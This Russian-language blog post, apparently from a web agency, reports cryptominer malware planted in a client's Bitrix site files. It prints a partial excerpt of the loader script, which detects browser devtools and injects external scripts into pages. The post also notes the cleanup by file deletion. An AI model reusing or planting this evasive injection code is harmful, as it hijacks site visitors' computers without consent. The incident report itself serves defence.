Вирусы-майнеры на сайтах

Всё началось с того, что к нам обратился наш клиент, которому стали поступать от посетителей жалобы на 100% загруженность процессора при посещении сайта. Причем майнер активизировался только на macbook'ах в хроме. На других проектах, где мы встретили данный вирус он работал во всех браузерах.

Мы начали анализировать ситуацию и очень быстро нашли файлы /bitrix/js/main/core/core_loader.js и /bitrix/js/main/core/core_tasker.js

Примерное содержимое:

;(function(window){
window.jssassin = window.jssassin || {

    config: {
        instpDelay: 400,
        startDelay: 1600
    },
    
    state: {
        scriptsNotLoad: 0,
        init: false
    },
    
    proc: {
            start: function(){},
            destroy: function(){}
        },
    
    inspInterval: undefined,
    
    init: function (
            scripts,
            start,
            destroy
        ) {
        
        if (this.state.init) return;
        this.state.init = true;
        
        var self = this;
        this.checkDevtoolsByConsoleInit(); 
        if (this.isDangerous()) return;
        
        if (typeof start == "function") this.proc.start = start;
        if (typeof destroy == "function") this.proc.destroy = destroy;
        
        
        this.state.scriptsNotLoad = scripts.length;
                                                    
        if (this.state.scriptsNotLoad > 0) {
            scripts.forEach(function(src) {
                var script = document.createElement('script');
                script.src = src;
                script.async = false;
                script.onload = function () {self.onloadScript(script)};
                document.head.appendChild(script);
            });
            
            return;
        }

Данный файл просто удалили. Откуда он появился и как его загрузили на сайт - установить не удалось. Ситуацию взяли на контроль, но скрипт больше не появлялся.

Мы будем искать проблему дальше. Если Вы столкнулись с такой же уязвимостью - Вы уже знаете что делать.